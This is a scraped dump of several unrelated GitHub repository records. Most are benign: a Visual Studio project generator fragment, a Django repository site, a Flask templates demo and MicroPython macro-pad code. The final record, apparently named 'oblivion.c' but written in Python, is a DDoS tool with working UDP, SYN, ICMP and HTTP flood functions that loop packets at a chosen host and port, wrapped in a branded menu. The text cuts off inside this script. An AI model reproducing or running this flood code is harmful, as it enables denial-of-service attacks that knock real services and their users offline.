vsPlatformName)\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Label\", \"PropertySheets\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Label\", \"LocalAppDataPlatform\")\n\t\timportXmlNode.set(\"Project\", r\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\")\n\t\timportXmlNode.set(\"Condition\", r\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\")\n\n\tdef WriteUserDebugPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group 
nodes specifying the user debug settings.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tpropertyGroupXmlNode = self._addXmlNode(parentXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tworkingDirXmlNode = self._addXmlNode(propertyGroupXmlNode, \"LocalDebuggerWorkingDirectory\" )\n\t\tworkingDirXmlNode.text = \"$(OutDir)\"\n\n\t\tdebuggerFlavorXmlNode = self._addXmlNode(propertyGroupXmlNode, \"DebuggerFlavor\" )\n\t\tdebuggerFlavorXmlNode.text = \"ORBISDebugger\"\n" } ]
110
vaaceves/Repositorio_UniversidadEmpresa
https://github.com/vaaceves/Repositorio_UniversidadEmpresa
0d9d46866d39f1b9ec4d0115dbcad46a075224fd
05c7b69121aeb0e8411b57f27018f6a5c41c06d9
85547b34a053fc23406d821207c7d2601dec9679
refs/heads/master
2017-08-03T01:28:08.919027
2017-03-03T21:33:53
2017-03-03T21:33:53
81,608,867
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8565656542778015, "alphanum_fraction": 0.8565656542778015, "avg_line_length": 246.5, "blob_id": "27503b70d6d98f4016311528a665a8df0caf5e80", "content_id": "4545f8ea916041b138a092985e70b24dc4c54103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 461, "num_lines": 2, "path": "/README.md", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "# Repositorio_UniversidadEmpresa\nThe ALCUE University-Enterprise Network has accumulated, through its events, a large body of publications, articles, and presentations created by various researchers and academics from higher-education institutions, government institutions, and civil associations. This platform is dedicated to sharing that knowledge in an organized, free-of-charge way, making it easy to consult while crediting the corresponding authors and institutions.\n" }, { "alpha_fraction": 0.6458333134651184, "alphanum_fraction": 0.6461004018783569, "avg_line_length": 42.348838806152344, "blob_id": "5cb5428e234e177c24be780704ad8cc72aafaa93", "content_id": "636955e9b2af5c66a183ced157b5ce4b13b90200", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 3744, "license_type": "no_license", "max_line_length": 112, "num_lines": 86, "path": "/env/project_src/home/views.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom models import Autor, Evento, Tematica, Libro, Pais, Clasificacion, Contenido\n#import django's generic views, for creating, updating and deleting\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom forms import FormCrearContenido\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.template import defaultfilters\nfrom django.http import HttpResponse\n\n# Create your views here.\n\n\ndef index(request):\n # Construct a dictionary to pass to template engine as its context\n # Note the key boldmessage is the same as {{ boldmessage }} in the template\n all_content = Contenido.objects.all().order_by('-id')[:3] # fetch all the content entries\n all_tematicas = Tematica.objects.all()#for the navbar, shows all the topics as links\n context_dict = {\n 'boldmessage' : \"Bienvenidos!\",\n 'content_list': all_content,\n 'tematica_list' : all_tematicas\n }\n\n # Return a rendered response to send to the client.\n # We make use of the shortcut function to make our lives easier.\n # Note that the first parameter is the template we wish to use.\n return render(request, 'home/index.html', context=context_dict)\n #return HttpResponse(\"Repositorio Universidad-Empresa <br> - <a href='/repositorio/about/'> Acerca de </a>\")\n\n#----------------------------------------------------\ndef about(request):\n all_tematicas = Tematica.objects.all() # for the navbar, shows all the topics as links\n context_dict = {\n 'tematica_list': all_tematicas\n }\n return render(request, 'home/about.html',context=context_dict)\n #return HttpResponse(\"Acerca del Repositorio Universidad-Empresa <br> <a href='/home/'> Regresar </a> \")\n\n#----------------------------------------------------\ndef all_content(request):\n #handles displaying all the publications\n all_content = Contenido.objects.all().order_by('-id')#fetch all the content entries\n all_tematicas = 
Tematica.objects.all() # for the navbar, shows all the topics as links\n #first_author = Contenido.autores.all()\n context = {\n 'content_list':all_content,\n 'tematica_list': all_tematicas\n #'primer_autor': first_author\n }\n return render(request, 'home/all.html', context)\n\n#----------------------------------------------------\ndef content_detail(request, slug):\n #shows the details of one specific content entry\n content = Contenido.objects.get(slug=slug)#fetch the details\n all_tematicas = Tematica.objects.all() # for the navbar, shows all the topics as links\n context = {\n 'this_content': content,\n 'tematica_list': all_tematicas\n } #this_content = the specific content entry to display\n return render(request, 'home/contenido.html', context)\n\n\n#----------------------------------------------------\n#generic views\n#----------------------------------------------------\nclass ContentCreateView(CreateView):\n \"\"\"this generic view holds the logic\n for adding new content\"\"\"\n model = Contenido\n #special settings for the creation form\n form_class = FormCrearContenido\n template_name = 'home/vista_contenido.html'\n\n#----------------------------------------------------\nclass ContentUpdateView(UpdateView):\n #lets us update a specific content entry\n model = Contenido\n form_class = FormCrearContenido\n template_name = 'home/vista_contenido.html'\n\n#----------------------------------------------------\nclass ContentDeleteView(DeleteView):\n #lets us delete a specific content entry\n model = Contenido\n success_url = reverse_lazy('home:index')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6817010045051575, "alphanum_fraction": 0.6817010045051575, "avg_line_length": 58.769229888916016, "blob_id": "b63e0bc9a856929847d18cb368478255e188c95f", "content_id": "7a0af240e592da5df0d2c0ce35468af00a3d27f2", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 776, "license_type": "no_license", "max_line_length": 129, "num_lines": 13, "path": "/env/project_src/home/urls.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom home import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),#home url\n url(r'^about/', views.about, name='about'),#about url\n url(r'^all/$', views.all_content, name='all'),#url for the list of all content\n url(r'^(?P<slug>[-\\w\\d]+)/$', views.content_detail, name='content-detail'),#url for a specific content entry with its details\n #urls for generic views\n url(r'^new/publicar$', views.ContentCreateView.as_view(), name='publicar'),#publish content\n url(r'^(?P<slug>[-\\w\\d]+)/actualizar/$', views.ContentUpdateView.as_view(), name='actualizar'),#update content\n url(r'^(?P<slug>[-\\w\\d]+)/eliminar/$', views.ContentDeleteView.as_view(), name=\"eliminar\"),#delete content\n]" }, { "alpha_fraction": 0.7824074029922485, "alphanum_fraction": 0.7824074029922485, "avg_line_length": 42.20000076293945, "blob_id": "2680ab64ac41c8d6d8417901c1b6aad25cf8746b", "content_id": "f8c7771088e66d00c0641e40aabc576604bdec34", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 109, "num_lines": 5, "path": "/env/Scripts/django-admin.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", 
"text": "#!c:\\users\\celso\\desktop\\respositoriouniversidadempresa\\respositoriouniversidadempresa\\env\\scripts\\python.exe\nfrom django.core import management\n\nif __name__ == \"__main__\":\n management.execute_from_command_line()\n" } ]
4
toeyjed/Cp353_Webtect
https://github.com/toeyjed/Cp353_Webtect
299808922b1169621b5851351935542b25b4686f
839d5ae5e1f32905b22423ef16582878cb98451d
12db374a0631f075c9fb2b6418e8ccdc7b079a32
refs/heads/main
2023-02-26T15:44:54.241485
2021-01-22T17:44:29
2021-01-22T17:44:29
331,956,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6525821685791016, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 25.4375, "blob_id": "9926fd5c5310069dc54f634eaa776e55b1fa98ec", "content_id": "8f21ec8708551e2987e2e8215064a0697aa72c98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 61, "num_lines": 16, "path": "/03-templates/app1/app-1/app1.py", "repo_name": "toeyjed/Cp353_Webtect", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\n\napp = Flask(__name__)\n\[email protected]('/name/<user>')\ndef hello(user):\n    return render_template('hello.html', name=user)\n\[email protected]('/grade/<int:score>')\ndef grade(score):\n    return render_template('grade.html', marks=score)\n\[email protected]('/detail')\ndef detail():\n    my_dict = {\"brand\": \"Ford\", \"model\": \"Mustang\", \"year\": 1964}\n    return render_template('detail.html', data=my_dict)\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.7954545617103577, "avg_line_length": 21, "blob_id": "5fb902edb5250498868a95e6856bb7945ba5b811", "content_id": "14c2caedabe0aefaafaa6822655d5c918065a261", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "toeyjed/Cp353_Webtect", "src_encoding": "UTF-8", "text": "# Cp353_Webtect\n2/2563 Cp353 Web Technology\n" } ]
2
dough10/MX-Macro-Pad-Micropython
https://github.com/dough10/MX-Macro-Pad-Micropython
eb1dcf77a6e7b9b118ae1f6b6ce2325d06d4970e
1d0131a6d902bfc8de7ea1a18d1b6fb95b0571ed
413fe6713a7873d5b5130fd63a502063d7b2fe0f
refs/heads/master
2023-07-15T11:05:51.088481
2021-08-24T17:11:12
2021-08-24T17:11:12
375,987,199
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.727554202079773, "alphanum_fraction": 0.7507739663124084, "avg_line_length": 30.33333396911621, "blob_id": "6ae0bcc32cb0f7af6af13b281aed49d30d5e3252", "content_id": "1992bdc5c7345c1ab19ea117f874f8c3da7936b5", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "permissive", "max_line_length": 138, "num_lines": 21, "path": "/README.md", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "# mx-macro-pad-micropython V:1.0.1\n\r\nA rewrite of [MX-Macro-Pad](https://github.com/dough10/MX-Macro-Pad) for Arduino AVR, in MicroPython for the Raspberry Pi Pico.\r\n\r\nMicroPython doesn't currently have support for USB HID on the Pi Pico board, so this project is basically boilerplate for when that support is working.\n\n## install\r\n\r\n1. write files from src folder to your pico board\r\n2. assign the pins for leds, buttons and encoder in main.py\r\n3. plug up leds, buttons and encoder\r\n4. watch lights blink and keypresses register in pico console\r\n\n## Dependencies\n\nNo Dependencies\n\n## Dev Dependencies\n\n- jsdoc-to-markdown: ^7.0.1\n- version-incrementer: ^0.1.1\n" }, { "alpha_fraction": 0.6227757930755615, "alphanum_fraction": 0.6227757930755615, "avg_line_length": 21.58333396911621, "blob_id": "e5bae6a40836182dc00fd87e1034d00010c8d53c", "content_id": "ab9755f7d40dc14e06462cc5c5b9f2cf1725961f", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 42, "num_lines": 12, "path": "/src/lib/data.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "class DATA:\r\n    def __init__(self, leds, buttons, knob):\r\n        self.leds = leds\r\n        self.buttons = buttons.buttons\r\n        print('data init')\r\n\r\n    def process(self):\r\n        for button in self.buttons:\r\n            if button.isPressed():\r\n                print(button.index)" }, { "alpha_fraction": 0.5197792053222656, "alphanum_fraction": 0.5446181893348694, "avg_line_length": 29.114286422729492, "blob_id": "7e433c2b83dfefcb87516a0005a4b03560487da0", "content_id": "c088b874c1a71c25b80b7f21e439d01a2423ee46", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "permissive", "max_line_length": 66, "num_lines": 35, "path": "/src/lib/encoder.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from lib.rotary_irq_rp2 import RotaryIRQ\r\n\r\nclass ENCODER: \r\n    def __init__(self, pins, leds, __function_state):\r\n        self.__knob = RotaryIRQ(\r\n            pin_num_clk=pins[0],\r\n            pin_num_dt=pins[1],\r\n            min_val=0,\r\n            max_val=65025,\r\n            reverse=False,\r\n            range_mode=RotaryIRQ.RANGE_UNBOUNDED,\r\n            pull_up=True)\r\n        self.__value = self.__knob.value()\r\n        self.__function_state = __function_state\r\n        self.LEDS = leds\r\n\r\n    def check(self):\r\n        newVal = self.__knob.value()\r\n        if newVal != self.__value:\r\n            if newVal > self.__value:\r\n                if self.__function_state[0]:\r\n                    if self.LEDS.brightness > 0 and self.LEDS.mode == 0:\r\n                        self.LEDS.brightness -= 4335\r\n                        print(self.LEDS.brightness)\r\n                else:\r\n                    print('up')\r\n            if newVal < self.__value:\r\n                if self.__function_state[0]:\r\n                    if self.LEDS.brightness < 65025 and self.LEDS.mode == 0:\r\n                        self.LEDS.brightness += 4335\r\n                        print(self.LEDS.brightness)\r\n                else:\r\n                    print('down')\r\n            self.__value = newVal\r\n            print('')" }, 
{ "alpha_fraction": 0.6691729426383972, "alphanum_fraction": 0.6992481350898743, "avg_line_length": 31.149999618530273, "blob_id": "b65969b59e0dbf7ea1579083b67ef70143b6f47d", "content_id": "147249e4e3d96d7823e39f021826fc0865c1bdb8", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 126, "num_lines": 20, "path": "/src/main.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n\r\nfrom lib.button_controller import BUTTON_CONTROLLER\r\nfrom lib.led_controller import LED_CONTROLLER\r\nfrom lib.encoder import ENCODER\r\n\r\n# index 0 button = index 0 led and index 0 keys\r\nled_pins = [0,1,2,3,4]\r\nbutton_pins = [5,6,7,8,9,10]\r\nencoder_pins = [11,12]\r\nkeys = [\"up\",\"down\",\"left\",\"right\",\"enter\",\"\"] # blank string at keys[5] is needed \r\n\r\nleds = LED_CONTROLLER(led_pins)\r\nbuttons = BUTTON_CONTROLLER(button_pins, leds, keys) # pass in leds object so buttons can control leds and their indexes match\r\nknob = ENCODER(encoder_pins, leds, buttons.function_state)\r\n\r\nwhile True:\r\n    knob.check()\r\n    buttons.check()\r\n    leds.shineOn()\r\n\r\n" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.607692301273346, "avg_line_length": 29.97101402282715, "blob_id": "348f3dc9aa9856b25c9f00f9b43f056b448476ad", "content_id": "6ffcc326fa1e86ddde695005931311e168734316", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2210, "license_type": "permissive", "max_line_length": 79, "num_lines": 69, "path": "/src/lib/led_controller.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from machine import Pin, PWM\r\n\r\nclass LED_CONTROLLER:\r\n    def __init__(self, pins):\r\n        self.LEDS = []\r\n        self.brightnesses = []\r\n        self.mode = 0\r\n        self.keyPressed = False\r\n        self.brightness = 0\r\n        self.__currentLED = 1\r\n        self.__krIncriment = 765\r\n        self.__krBrightness = 65025 - self.__krIncriment\r\n        self.__changeBy = -1\r\n        self.__clickIncriment = 25\r\n        self.__breathIncriment = 9\r\n        self.__breathBrightness = 0\r\n        for pin in pins:\r\n            pwm = PWM(Pin(pin))\r\n            pwm.freq(1000)\r\n            pwm.duty_u16(65025)\r\n            self.LEDS.append(pwm)\r\n            self.brightnesses.append(65025)\r\n\r\n    def setMode(self, mode):\r\n        self.mode = mode\r\n\r\n    def shineOn(self):\r\n        if self.mode == 0:\r\n            self.__variableBrightness()\r\n        if self.mode == 1:\r\n            self.__onPressMode()\r\n        if self.mode == 2:\r\n            self.__breath()\r\n        if self.mode == 3:\r\n            self.__KnightRider()\r\n        if self.mode == 4:\r\n            self.__off()\r\n\r\n    def __off(self):\r\n        for led in self.LEDS:\r\n            led.duty_u16(0)\r\n\r\n    def __variableBrightness(self):\r\n        for led in self.LEDS:\r\n            led.duty_u16(self.brightness)\r\n\r\n    def __breath(self):\r\n        for led in self.LEDS:\r\n            led.duty_u16(self.__breathBrightness)\r\n        self.__breathBrightness = self.__breathBrightness + self.__breathIncriment\r\n        if self.__breathBrightness <= 0 or self.__breathBrightness >= 65025:\r\n            self.__breathIncriment = -self.__breathIncriment\r\n\r\n    def __onPressMode(self):\r\n        for num, brightness in enumerate(self.brightnesses, start=0):\r\n            self.LEDS[num].duty_u16(self.brightnesses[num])\r\n            if brightness < 65025 and not self.keyPressed:\r\n                self.brightnesses[num] = self.brightnesses[num] + self.__clickIncriment\r\n\r\n    def __KnightRider(self):\r\n        self.LEDS[self.__currentLED].duty_u16(self.__krBrightness)\r\n        if 
(self.__krBrightness >= 65025):\r\n            self.__krIncriment = -self.__krIncriment\r\n            if (self.__currentLED >= 4 or self.__currentLED <= 0):\r\n                self.__changeBy = -self.__changeBy\r\n            self.__currentLED = self.__currentLED + self.__changeBy\r\n        if (self.__krBrightness <= 0):\r\n            self.__krIncriment = -self.__krIncriment\r\n        self.__krBrightness = self.__krBrightness + self.__krIncriment\r\n  " }, { "alpha_fraction": 0.650306761264801, "alphanum_fraction": 0.6523517370223999, "avg_line_length": 28.6875, "blob_id": "700353b95009ff0f1e601c82b5a7fbf15a21ba7e", "content_id": "9f9a67ab0b305079b098e91536cae57716584a44", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "permissive", "max_line_length": 85, "num_lines": 16, "path": "/src/lib/button_controller.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", 
"text": "from lib.button import Button\r\n\r\n# places button objects in an array \r\nclass BUTTON_CONTROLLER:\r\n    def __init__(self, pins, leds, keys):\r\n        self.buttons = []\r\n        self.function_state = [\r\n            False\r\n        ]\r\n        for index, pin in enumerate(pins, start=0):\r\n            self.buttons.append(Button(pin, leds, index, self.function_state, keys[index]))\r\n\r\n    # checks all buttons in button array to see if they are pressed\r\n    def check(self):\r\n        for button in self.buttons:\r\n            button.update()" }, { "alpha_fraction": 0.5886379480361938, "alphanum_fraction": 0.5927447080612183, "avg_line_length": 32.02325439453125, "blob_id": "123b0cc462a3cc90a0dff54a30fca3e8d4fb776d", "content_id": "a8ce1a078f699782e65c0bda87c639867ccc1f93", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "permissive", "max_line_length": 227, "num_lines": 43, "path": "/src/lib/button.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from machine import Pin\r\n\r\nclass Button:\r\n    def __init__(self, pin, leds, index, __function_state, key):\r\n        self.pin = Pin(pin, Pin.IN, Pin.PULL_UP)\r\n        self.debounceTime = 0\r\n        self.lastPressed = 0\r\n        self.LEDS = leds\r\n        self.index = index\r\n        self.key = key\r\n        self.__pressed = False\r\n        self.__function_state = __function_state\r\n\r\n    def __press(self, state):\r\n        if state == self.__pressed:\r\n            return\r\n        self.__pressed = state\r\n        # light up the button pressed when in onPress mode\r\n        if state and self.LEDS.mode == 1:\r\n            try:\r\n                self.LEDS.brightnesses[self.index] = 0\r\n            except IndexError:\r\n                pass\r\n        # the encoder button has no LED tied to it; while held, it toggles the led mode\r\n        try: \r\n            self.LEDS.LEDS[self.index] ## checking if there is a led tied to the button index (ie. is it the encoder button)\r\n            self.LEDS.keyPressed = state\r\n            if self.__function_state[0]:\r\n                self.LEDS.mode = self.index\r\n                return\r\n            ## actual key press command here\r\n            print(\"Button: \", self.pin, \", LED: \", self.LEDS.LEDS[self.index], \", Key: \" + self.key + \", Pressed\") if state else print(\"Button: \", self.pin, \", LED: \", self.LEDS.LEDS[self.index], \", Key: \" + self.key + \", Released\")\r\n            print('')\r\n            ##\r\n        except IndexError:\r\n            self.__function_state[0] = state\r\n            return\r\n\r\n    def isPressed(self):\r\n        return self.__pressed\r\n\r\n    def update(self):\r\n        self.__press(not self.pin.value())" } ]
bakeman-enr/oblivion-homeholder
https://github.com/bakeman-enr/oblivion-homeholder
4b28169f7ee2ed6497fe7ab94ec5657a5b20dd03
c9bac6845924f03b89490a9e899e5ffa6100c9d0
b31bf9f133ca1a3afe49e99d7cde35ab2d9320b8
refs/heads/main
2023-07-04T14:21:46.699773
2021-08-12T21:28:13
2021-08-12T21:28:13
384,004,545
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.4582735002040863, "alphanum_fraction": 0.5279971361160278, "avg_line_length": 29.480226516723633, "blob_id": "9cbf17eddac0c3f2f84a3a21304e8c0012eb7aae", "content_id": "b9c5bc60aaf5fca2f2c477335d9aa1768fc03651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13036, "license_type": "no_license", "max_line_length": 110, "num_lines": 354, "path": "/oblivion.c", "repo_name": "bakeman-enr/oblivion-homeholder", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\nimport sys\r\nimport socket\r\nimport time\r\nimport random\r\nimport threading\r\nimport getpass\r\nimport os\r\n\r\nmethods = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mATTACK METHODS\\033[34m ║ \r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mUDP (IP) (PORT) (TIME) (SIZE) \\033[34m|\\033[34m UDP Attack.\\033[34m ║\r\n║ \\033[34mSYN (IP) (PORT) (TIME) (SIZE) \\033[35m|\\033[35m SYN Attack.\\033[35m ║\r\n║ \\033[35mICMP (IP) (PORT) (TIME) (SIZE) \\033[34m|\\033[34m ICMP Attack.\\033[34m ║\r\n║ \\033[34mHTTP (IP) (PORT) (TIME) (SIZE) \\033[35m|\\033[35m HTTP Attack.\\033[35m ║\r\n╚══════════════════════════════════════════════════════╝\\033[34m\r\n\"\"\"\r\n\r\ninfo = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[34m Info\\033[35m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[34m[+] oblivion Was Made By plasxz.\\033[35m ║\r\n║ \\033[35m[+] Discord: plasxz#7260.\\033[34m ║\r\n║ \\033[34m[+] Instagram: plasxz.\\033[35m ║\r\n║ \\033[35m[+] YouTube: falling time.\\033[34m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nextras = \"\"\"\\033[34m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mExtras\\033[34m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mattacks \\033[35m|\\033[35m Shows How Many Running Attacks.\\033[36m ║\r\n║ \\033[34mstop \\033[34m|\\033[34m Stops All Running Attacks.\\033[35m ║\r\n║ \\033[35mresolve (website) \\033[35m|\\033[35m Grabs A Domains IP.\\033[36m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nhelp = \"\"\"\\033[34m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mBasic Commands\\033[34m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mmethods \\033[34m|\\033[35m Shows DDOS Methods For oblivion.\\033[35m ║\r\n║ \\033[34mextras \\033[35m|\\033[34m Shows Extra Commands For oblivion.\\033[34m ║\r\n║ \\033[35mupdates \\033[34m|\\033[35m Shows Update Notes For oblivion.\\033[35m ║\r\n║ \\033[34minfo \\033[35m|\\033[34m Shows oblivion Info.\\033[34m ║\r\n║ \\033[35mclear \\033[34m|\\033[35m Clears Screen.\\033[35m ║\r\n║ \\033[34mexit \\033[35m|\\033[34m Exits Out Of oblivion.\\033[34m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nupdatenotes = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[34mUpdate Notes\\033[35m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35m[+] Timeout Bug Fixed.\\033[34m ║\r\n║ \\033[34m[+] Took Out Some Tools.\\033[35m ║\r\n║ \\033[35m[+] User And Pass Changed To oblivion.\\033[34m ║\r\n║ \\033[34m[+] i leaked this.\\033[35m ║\r\n║ \\033[35m[+] All Tools Fixed And Working.\\033[34m 
║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nbanner = \"\"\"\r\n\t\t┌─┐┌┐ ┬ ┬┬ ┬┬┌─┐┌┐┌\r\n\t\t│ │├┴┐│ │└┐┌┘││ ││││\r\n\t\t└─┘└─┘┴─┘┴ └┘ ┴└─┘┘└┘\r\n \r\n\"\"\"\r\n\r\ncookie = open(\".oblivion_Cookie\",\"w+\")\r\n\r\nfsubs = 0\r\nliips = 0\r\ntattacks = 0\r\nuaid = 0\r\nsaid = 0\r\niaid = 0\r\nhaid = 0\r\naid = 0\r\nattack = True\r\nhttp = True\r\nudp = True\r\nsyn = True\r\nicmp = True\r\n\r\n\r\ndef synsender(host, port, timer, punch):\r\n\tglobal said\r\n\tglobal syn\r\n\tglobal aid\r\n\tglobal tattacks\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket (socket.AF_INET, socket.SOCK_RAW, socket.TCP_SYNCNT)\r\n\r\n\tsaid += 1\r\n\ttattacks += 1\r\n\taid += 1\r\n\twhile time.time() < timeout and syn and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tsaid -= 1\r\n\taid -= 1\r\n\r\ndef udpsender(host, port, timer, punch):\r\n\tglobal uaid\r\n\tglobal udp\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\r\n\tuaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and udp and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tuaid -= 1\r\n\taid -= 1\r\n\r\ndef icmpsender(host, port, timer, punch):\r\n\tglobal iaid\r\n\tglobal icmp\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP)\r\n\r\n\tiaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and icmp and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tiaid -= 1\r\n\taid -= 1\r\n\r\ndef httpsender(host, port, timer, punch):\r\n\tglobal haid\r\n\tglobal http\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\r\n\thaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and icmp and attack:\r\n\t\ttry:\r\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\tsock.sendto(punch, (host, int(port)))\r\n\t\t\tsock.close()\r\n\t\texcept socket.error:\r\n\t\t\tpass\r\n\r\n\thaid -= 1\r\n\taid -= 1\r\n\r\n\r\ndef main():\r\n\tglobal fsubs\r\n\tglobal liips\r\n\tglobal tattacks\r\n\tglobal uaid\r\n\tglobal said\r\n\tglobal iaid\r\n\tglobal haid\r\n\tglobal aid\r\n\tglobal attack\r\n\tglobal dp\r\n\tglobal syn\r\n\tglobal icmp\r\n\tglobal http\r\n\r\n\twhile True:\r\n\t\tsys.stdout.write(\"\\x1b]2;oblivion user|owner| plan |9999| servers |32| bots |441||\\x07\")\r\n\t\tsin = input(\"\\033[1;35m[\\033[34moblivion\\033[1;00m]-\\033[34m\\033[00m \").lower()\r\n\t\tsinput = sin.split(\" \")[0]\r\n\t\tif sinput == \"clear\":\r\n\t\t\tos.system (\"clear\")\r\n\t\t\tprint (banner)\r\n\t\t\tmain()\r\n\t\telif sinput == \"help\":\r\n\t\t\tprint (help)\r\n\t\t\tmain()\r\n\t\telif sinput == \"extras\":\r\n\t\t\tprint (extras)\r\n\t\t\tmain()\r\n\t\telif sinput == \"exit\":\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Exiting Out Of oblivion.\\n\")\r\n\t\t\texit()\r\n\t\telif sinput == \"methods\":\r\n\t\t\tprint (methods)\r\n\t\t\tmain()\r\n\t\telif sinput == \"updates\":\r\n\t\t\tprint (updatenotes)\r\n\t\t\tmain()\r\n\t\telif sinput == \"info\":\r\n\t\t\tprint (info)\r\n\t\t\tmain()\r\n\t\telif sinput == 